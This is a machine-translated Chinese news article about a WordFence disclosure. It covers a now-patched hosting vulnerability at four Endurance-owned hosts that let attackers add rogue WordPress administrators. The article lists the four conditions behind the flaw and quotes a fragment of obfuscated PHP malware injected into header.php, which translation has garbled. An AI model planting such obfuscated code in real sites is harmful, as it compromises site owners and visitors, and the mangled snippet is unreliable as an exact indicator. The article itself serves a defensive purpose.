[ad_1]
WordFence宣布他们在四家托管公司发现了一个漏洞。 WordFence警告说,虽然该漏洞已修补,但可能的网站在修复之前被黑客入侵。
服务器设置允许黑客创建WordPress管理员帐户,从中可以利用添加到WordPress主题的恶意代码来利用这些站点。
WordFence敦促网站管理员检查他们的网站是否存在流氓管理员帐户(如果他们托管在iPage,FatCow,PowWeb或NetFirm上)。这四家公司都归同一家公司Endurance International Group所有。
什么是服务器漏洞?
受影响的服务器具有允许攻击者查看敏感文件的权限和文件设置。其他漏洞允许攻击者访问数据库,将自己添加为管理员然后接管该网站。
这就是WordFence描述漏洞的方式:
“存在导致此漏洞的四个条件:
1.客户文件都存储在共享文件系统中。
2.用户的Web根目录的完整路径是公开的或可能被猜到。
3.客户站点根目录路径中的所有目录都是遍历世界的(“所有用户”的执行位为1)或组遍历(“组”的执行位为1),以及敏感文件世界可读(“所有用户”的读取位为1)或组可读(“组”的读取位为1)。
4.攻击者可以使组www中运行的程序读取任意位置的文件。“
网站可能会受到感染
WordFence警告说,在此漏洞被修复之前有一段时间,在这四个主机提供商上托管的网站可能已被感染。
建议网站所有者检查其用户列表,以确保没有未经授权的管理员。如果您的网站受到影响,则应该添加到主题中的流氓代码。
以下是WordFence如何描述流氓代码:
“如果您的网站在修复之前被利用,攻击者可能会添加可能仍然存在的恶意软件。我们的客户在活动主题的header.php文件的顶部添加了混淆代码,类似于:
<?php $ {“ x47 x4c x4f x42 x41 x4c x53”}(“dd x70 x68z x67 x64gx”)=“sl x77k x77i”; $ {“ x47 x4cO X42 x41L X53” }(‘C X7A X66 x6dubkdo X6A X78“)=’ X6C x6f X63 X61T X69 x6fn”; $ {“ X47 x4c x4fB x41LS”}(‘ X67 64 x64e X74 x62p x75f x65i’)=” x68t X6D X6C”; $ {‘ X47 x4cOB X41 x4cS’}(“ x77i x64的 X68 x6bv x6da”)=” x73t X72 X66“; $ {‘ X47 x4c x4f X42 X41 x4c X53’}(‘ x66s X75 X71 X79 x6evw’ )=” b x6f X74“; $ {‘ X47 x4cOBAL X53’}(‘W X6C X79 X63 X61 X76 X62 X71 X68 x6f X6C X75”)=’ CAC X68 X65” ; $ {‘G x4cO X42 x41L X53’}(‘RY X68 x72ku X6B’)=” X73 x63h X65 X6D X65“; $ {“ X47 x4c x4f X42 x41L X53” }(‘ X74 X6A x6bc x64e X65 x69w’)=” x73l x77k x77i X32“; $ {‘G x4cOBA x4cS’ }(“ X79 X65 64 X73 X67 x6ah X69 X73 X67“)=” X73 X6C x74l X65 x69l X73”;”
漏洞已得到修复
在发布公告之前,WordFence向托管公司披露了这一漏洞。托管公司迅速修复了漏洞。
尽管如此,根据WordFence提供的指导,您可能希望检查您的用户列表中的恶意管理员级别帐户,并查看您的header.php文件中的恶意代码。
Shutterstock的图片,作者修改